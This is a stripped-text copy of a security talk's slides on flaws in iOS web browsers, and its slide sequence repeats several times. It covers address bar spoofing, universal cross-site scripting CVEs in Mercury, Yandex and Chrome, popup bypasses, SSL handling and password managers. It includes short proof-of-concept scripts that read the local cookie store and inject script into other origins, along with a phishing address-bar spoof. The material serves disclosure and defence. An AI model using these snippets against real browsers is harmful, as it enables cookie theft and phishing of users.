Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
